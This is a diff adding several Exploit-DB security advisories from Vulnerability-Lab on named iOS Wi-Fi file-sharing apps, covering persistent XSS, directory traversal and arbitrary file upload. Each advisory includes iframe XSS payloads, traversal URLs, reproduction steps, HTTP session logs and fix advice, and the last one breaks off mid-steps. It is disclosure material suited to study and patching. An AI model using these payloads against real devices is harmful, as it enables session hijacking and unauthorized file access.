+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A persistent cross site scripting web vulnerability has been discovered
+in the official SuperBackup v2.0.5 ios mobile application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise the mobile
+web-application from the application-side.
+
+The cross site scripting web vulnerabilities are located in the
+`newPath`, `oldPath` & `filename` parameters of the vcf listing module.
+Remote attackers are able to inject own malicious persistent script
+codes as vcf filename to the main index list. The request method to
+inject is POST and the attack vector of the vulnerability is located on
+the application-side. The injection point is located at the vcf
+filename or import. The execution point occurs in the main index list
+after the import or insert.
+
+Remote attackers are able to inject own script codes to the client-side
+requested vulnerable web-application parameters. The attack
+vector of the vulnerability is persistent and the request method to
+inject/execute is POST. The vulnerabilities are classic client-side
+cross site scripting vulnerabilities. Successful exploitation of the
+vulnerability results in session hijacking, persistent phishing
+attacks, persistent external redirects to malicious source and
+persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] VCF
+
+Vulnerable Parameter(s):
+[+] newPath (path - vcf filename)
+[+] oldPath (path - vcf filename)
+
+
+Proof of Concept (PoC):
+=======================
+The cross site scripting vulnerability can be exploited by remote
+attackers without privileged user account and with low user interaction.
+For security demonstration or to reproduce the cross site scripting
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payload (Filename)
+>"<iframe%20src=evil.source%20onload=alert("PWND")></iframe>
+
+
+PoC: Vulnerable Source (Listing - Index)
+<button type="button" class="btn btn-default btn-xs button-download">
+<span class="glyphicon glyphicon-download-alt"></span>
+</button>
+</td>
+<td class="column-name"><p class="edit" title="Click to
+rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td>
+<td class="column-size">
+<p>26.40 KB</p>
+</td>
+<td class="column-delete">
+<button type="button" class="btn btn-danger btn-xs button-delete">
+<span class="glyphicon glyphicon-trash"></span>
+</button>
+</td>
+</tr></tbody></table>
+</div>
+
+
+PoC: Exception-Handling
+Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
+.vcf"
+to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>
+09:17:12:PM 10:Apr.:2020 .vcf"
+-
+Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
+.vcf"
+to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source
+onload=alert("PWND")></iframe> .vcf"
+-
+Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020
+.vcf"
+to "/Contacts >"<iframe src=evil.source
+onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf"
+
+
+PoC: Exploit
+BEGIN:VCARD
+VERSION:3.0
+PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN
+B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;;
+END:VCARD
+
+
+--- PoC Session Logs [POST] ---
+http://localhost/move
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 187
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/
+oldPath=/Contacts 09:17:12:PM 10:Apr.:2020
+.vcf&newPath=/evil-filename>"<iframe src=evil.source
+onload=alert("PWND")></iframe>.vc
+-
+POST: HTTP/1.1 500 Internal Server Error
+Content-Length: 593
+Content-Type: text/html; charset=utf-8
+Connection: Close
+Server: GCDWebUploader
+-
+http://localhost/evil.source
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer: http://localhost/
+-
+GET: HTTP/1.1 200 OK
+Server: GCDWebUploader
+Connection: Close
+
+
+Solution - Fix & Patch:
+=======================
+1. Parse and filter the vcf name values next to add, edit or imports to
+prevent an execution
+2. Restrict and filter in the index listing the vcf names to sanitize
+the output
+
+
+Security Risk:
+==============
+The security risk of the persistent vcf cross site scripting web
+vulnerability is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt
new file mode 100644
index 000000000..6063109bf
--- /dev/null
+++ b/exploits/ios/webapps/48327.txt
@@ -0,0 +1,245 @@
+# Title: File Transfer iFamily 2.1 - Directory Traversal
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Software Link: http://www.dedecms.com/products/dedecms/downloads/
+# CVE: N/A
+
+Document Title:
+===============
+File Transfer iFamily v2.1 - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2199
+
+
+Release Date:
+=============
+2020-04-14
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2199
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Vulnerability Class:
+====================
+Directory- or Path-Traversal
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Send photos, videos and documents to other devices without Internet. A
+complete application to exchange files
+wirelessly between devices. It uses the Multipeer Connectivity Framework
+to search and connect to available devices,
+without the need of internet connection or any kind of server and database.
+
+(Copy of the Homepage:
+https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575
+)
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a directory
+traversal web vulnerability in the official File Transfer iFamily v2.1
+ios mobile application.
+
+
+Affected Product(s):
+====================
+DONG JOO CHO
+Product: File Transfer iFamily v2.1 - iOS Mobile Web Application
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-14: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre auth - no privileges
+
+
+User Interaction:
+=================
+No User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A directory traversal web vulnerability has been discovered in the
+official File Transfer iFamily v2.1 ios mobile application.
+The vulnerability allows remote attackers to change the application path
+in performed requests to compromise the local application
+or file-system of a mobile device. Attackers are for example able to
+request environment variables or a sensitive system path.
+
+The directory-traversal web vulnerability is located in the main
+application path request performed via GET method. Attackers are
+able to request for example the local ./etc/ path of the web-server by
+changing the local path in the performed request itself.
+In a first request the attack changes the path, the host redirects to
+complete the adress with "..". Then the attacker just
+attaches a final slash to its request and the path can be accessed via
+web-browser to download local files.
+
+Exploitation of the directory traversal web vulnerability requires no
+privileged web-application user account or user interaction.
+Successful exploitation of the vulnerability results in information
+leaking by unauthorized file access and mobile application compromise.
+
+
+Proof of Concept (PoC):
+=======================
+The directory traversal vulnerability can be exploited by attackers with
+access to the wifi interface in a local network without user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information and steps below to continue.
+
+
+PoC: Exploitation
+http://localhost/../../../../../../../../../../../../../../../../../../../../../../
+http://localhost//../
+
+
+--- PoC Session Logs [GET]] ---
+http://localhost/../../../../../../../../../../../../../../../../../../../../../../
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 2521
+-
+http://localhost../etc/
+Host: localhost..
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+- add slash to correct host adress (/.././)
+http://localhost/./
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+- Access granted
+http://localhost/../../../../../../../../../../../../../../../../../../../../../../
+GET: HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Content-Length: 2521
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a restriction of the visible and
+accessable ./etc/ path in the app container.
+Disallow path changes in the client-side get method requests and
+validate them securely.
+
+
+Security Risk:
+==============
+The security risk of the directory travsersal web vulnerability in the
+ios mobile application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
\ No newline at end of file
diff --git a/exploits/ios/webapps/48340.txt b/exploits/ios/webapps/48340.txt
new file mode 100644
index 000000000..2960d2761
--- /dev/null
+++ b/exploits/ios/webapps/48340.txt
@@ -0,0 +1,423 @@
+# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
+# CVE: N/A
+
+Document Title:
+===============
+Playable v9.18 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2198
+
+
+Release Date:
+=============
+2020-04-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2198
+
+
+Common Vulnerability Scoring System:
+====================================
+7.3
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod
+Touch without conversion -
+just copy files to your device through iTunes or over Wifi! To search
+for closed captions /
+subtitles select a video then press the magnifying glass icon to the top
+right of the video.
+
+(Copy of the Homepage:
+https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
+)
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+vulnerabilities in the official Playable v9.18 apple ios mobile application.
+
+
+Affected Product(s):
+====================
+Portable Ltd
+Product: Playable v9.18 - iOS Mobile Web Application
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-16: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre auth - no privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+1.1
+A persistent script code injection web vulnerability has been discovered
+in the official Playable v9.18 apple ios mobile application.
+The vulnerability allows remote attackers to inject own malicious
+persistent script codes to the application-side for manipulation.
+
+The vulnerability is located in the filename parameter of the upload
+module. Attackers with wifi access are able to perform uploads
+with malicious script code to manipulation the mobile application ui.
+The request method to inject is POST and the attack vector of
+the vulnerability is persistent. Attackers are able to inject html and
+javascript codes to comrpomise the mobile wifi web-application.
+The injection point is the upload form on localhost:8881 and the
+execution occurs on localhost:80 with the visible ui listing.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected mobile
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Function(s):
+[+] upload
+
+Vulnerable Parameter(s):
+[+] filename
+
+
+1.2
+An arbitrary file upload web vulnerability has been discovered in the
+official Playable v9.18 apple ios mobile application.
+The arbitary file upload vulnerability allows remote attackers to upload
+malicious files to compromise the mobile application.
+
+The vulnerability is located in the filename parameter of the upload
+module. Attackers with wifi access are able to perform
+uploads with malicious file extions to bypass the parse function. In a
+second step the attacker requests the local file to
+execute the malicious content on the local web-server. The request
+method to inject is POST and the attack vector of the
+vulnerability is located on the application-side. The injection point is
+the upload form on localhost:8881. The execution
+point becomes visible by a request the localhost:80/vid/[filename] path
+with the uploaded file content. The is present
+because of a missing file parse and insecure upload handling on file
+extensions. As well the local web-server can be
+reconfigured to provide more security on user interactions.
+
+Successful exploitation of the arbitrary file upload vulnerability
+results in a compromise of the local ios mobile application.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Function(s):
+[+] upload
+
+Vulnerable Parameter(s):
+[+] filename
+
+Affected Module(s):
+[+] /vid/
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The persistent script code injection vulnerability can be exploited by
+remote attackers with wifi network access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install the ios application
+(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
+2. Start the ios application on your local ios device
+3. Start the wifi share service in the application ui
+4. Open the web-browser
+5. Tamper the http requests
+6. Prepare to upload any file and press the upload button
+7. Inject as filename any html/js script code payload
+8. Continue to transmit the POST method request
+9. The file executes on the index listing on port 8881
+(http://localhost:8881/index.html)
+10. Successful reproduce of the persistent script code injection web
+vulnerability!
+
+
+PoC: Exploitation
+>"<iframe src=evil.source onload=alert(document.domain)>.jpg
+
+
+--- PoC Session logs [POST] ---
+Status: 200[OK]
+POST http://localhost:8881/upload
+Mime Type[text/html]
+ Request Header:
+ Host[localhost:8881]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://localhost:8881/index.html]
+ Content-Length[8559]
+ Content-Type[multipart/form-data;
+boundary=---------------------------3823323145734]
+ Connection[keep-alive]
+ POST-Daten:
+ POST_DATA[-----------------------------3823323145734
+Content-Disposition: form-data; name="file"; filename=">"<iframe
+src=evil.source onload=alert(document.domain)>.jpg"
+-
+Status: 200[OK]
+GET http://localhost/evil.source
+Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost/evil.source]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Connection[keep-alive]
+ Upgrade-Insecure-Requests[1]
+ Cache-Control[max-age=0]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[8559]
+
+
+
+1.2
+the arbitrary file upload vulnerability can be exploited by local
+attackers with wifi network access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install the ios application
+(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
+2. Start the ios application on your local ios device
+3. Start the wifi share service in the application ui
+4. Open the web-browser
+5. Tamper the http requests
+6. Prepare a js file with malicious test content
+7. Extend the file name with .jpg
+Note: The upload mechanism does not parse or checks for multiple
+extensions on file uploads
+8. Upload the file by pushing the Upload File button
+9. Open the url in the default /vid/ folder and remove the .jpg extension
+10. The simple js executes in the scripting engine when opening
+11. Successful reproduce of the arbitrary file upload vulnerability!
+Note: Using the ftp you can perform to create the file via console
+ftp://localhost (read/write permissions)
+
+
+PoC: Exploitation
+http://localhost/vid/clay.js.jpg
+
+
+--- PoC Session logs [POST] ---
+Status: 200[OK]
+POST http://localhost:8881/upload
+Mime Type[text/html]
+ Request Header:
+ Host[localhost:8881]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+ Accept[*/*]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://localhost:8881/index.html]
+ Content-Length[86856]
+ Content-Type[multipart/form-data;
+boundary=---------------------------3823323145733]
+ Connection[keep-alive]
+ POST-Daten:
+ POST_DATA[-----------------------------3823323145733
+Content-Disposition: form-data; name="file"; filename="clay.js.jpg"
+-
+Status: 200[OK]
+GET http://localhost/listVideosJson
+Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+ Accept[application/json, text/javascript, */*; q=0.01]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost/]
+ Connection[keep-alive]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[87]
+-
+Status: 200[OK]
+GET http://localhost/vid/clay.js.jpg
+Mime Type[application/iosjpg]
+ Request Header:
+ Host[localhost]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://localhost/]
+ Connection[keep-alive]
+ Upgrade-Insecure-Requests[1]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[86670]
+ Content-Type[application/iosjpg;]
+-
+Status: 200[OK]
+GET http://localhost/vid/clay.js
+Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Connection[keep-alive]
+ Upgrade-Insecure-Requests[1]
+ Response Header:
+ Accept-Ranges[bytes]
+ Content-Length[0]
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The vulnerability can be resolved by a restriction and parse of the
+filename parameter. Disallow special chars and restrict inputs.
+Encode also the output locations to ensure nobody is able to execute
+script code in the main file listing.
+
+1.2
+Parse the filename for multiple extensions and prevent that attackers
+open specific dangerous file extensions that could
+compromise the local application path.
+
+
+Security Risk:
+==============
+1.1
+The security risk of the script code injection web vulnerability in the
+mobile ios application is estimated as high.
+
+1.2
+The security risk of the arbitrary file upload vulnerability in the
+mobile ios application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/ios/webapps/48375.txt b/exploits/ios/webapps/48375.txt
new file mode 100644
index 000000000..27dd13c8c
--- /dev/null
+++ b/exploits/ios/webapps/48375.txt
@@ -0,0 +1,322 @@
+# Title: Sky File 2.1.0 iOS - Directory Traversal
+# Author: Vulnerability Laboratory
+# Date: 2020-04-21
+# Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210
+# CVE: N/A
+
+Document Title:
+===============
+Sky File v2.1.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2207
+
+
+Common Vulnerability Scoring System:
+====================================
+7.2
+
+
+Affected Product(s):
+====================
+Jin Chen
+Product: Sky File v2.1.0 - (iOS) Mobile Web Application
+(https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-21: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+1.1
+Multiple persistent cross site scripting vulnerabilities has been
+discovered in the official Sky File v2.1.0 mobile ios web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The cross site vulnerability is located in the 'createFolder' module.
+Remote attackers with access to the ui via wifi are able
+to inject own malicious persistent script code to compromise the
+web-application or user credentials. The request method to
+inject is POST and the attack vector is located on the application-side.
+
+Successful exploitation of the vulnerability results session hijacking,
+persistent phishing, persistent external redirects and
+application-side manipulation of the web context of the affected and
+connected device module.
+
+
+1.2
+A directory traversal web vulnerability has been discovered in the
+official Sky File v2.1.0 mobile ios web-application.
+The web vulnerability allows an attacker to unauthorized change the path
+or directory to access sensitive application data.
+
+The directory / path webvulnerability is located in the local ftp server
+configuration and path validation with the insecure
+access permissions. Normally the anonymous user account is only able to
+move inside the main app folder but not above to the
+web-server and root application files. In case of the issue remote
+attackers are able to connect with anonymous user account
+credentials to the wifi ftp server. After that the attacker can use a
+misconfiguration in the ftp server of the app path to
+transmit a `/null//` path commands after CWD and CDUP navigation via ftp
+client. Thus allows the attacker to finally
+unauthorized access the main root application path.
+
+Successful exploitation of the directory traversal vulnerability results
+in unauthorized file system access and information disclosure.
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The persistent script code inject vulnerability can be exploited by
+remote attackers with wifi network access with low user interaction.
+For security demonstration or to reproduce the web vulnerability follow
+the provided information and steps below to continue.
+
+
+PoC: Payload
+%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:10000/create
+Mime Type[application/json]
+ Request Header:
+ Host[localhost:10000]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+ Accept[application/json, text/javascript, */*; q=0.01]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:10000/]
+ Content-Length[140]
+ Connection[keep-alive]
+ POST-Daten:
+
+path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E]
+ Response Header:
+ Cache-Control[no-cache]
+ Content-Length[2]
+ Content-Type[application/json]
+ Connection[Close]
+ Server[GCDWebUploader]
+-
+Status: 200[OK]
+GET
+http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E
+Mime Type[application/json]
+ Request Header:
+ Host[localhost:10000]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+ Accept[application/json, text/javascript, */*; q=0.01]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ X-Requested-With[XMLHttpRequest]
+ Referer[http://localhost:10000/]
+ Connection[keep-alive]
+ Response Header:
+ Cache-Control[no-cache]
+ Content-Length[2]
+ Content-Type[application/json]
+ Connection[Close]
+ Server[GCDWebUploader]
+-
+Status: 200[OK]
+GET http://localhost:10000/evil.source
+Mime Type[application/x-unknown-content-type]
+ Request Header:
+ Host[localhost:10000]
+ User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+ Accept-Language[de,en-US;q=0.7,en;q=0.3]
+ Accept-Encoding[gzip, deflate]
+ Referer[http://localhost:10000/]
+ Connection[keep-alive]
+ Upgrade-Insecure-Requests[1]
+ Response Header:
+ Server[GCDWebUploader]
+ Connection[Close]
+
+
+
+1.2
+The directory traversal web vulnerability can be exploited by remote
+attackers with wifi network access without user interaction.
+For security demonstration or to reproduce the web vulnerability follow
+the provided information and steps below to continue.
+
+
+Manual steps to reproduce ...
+1. Open the ftp preview the visible folders
+2. Jump back to the the following path
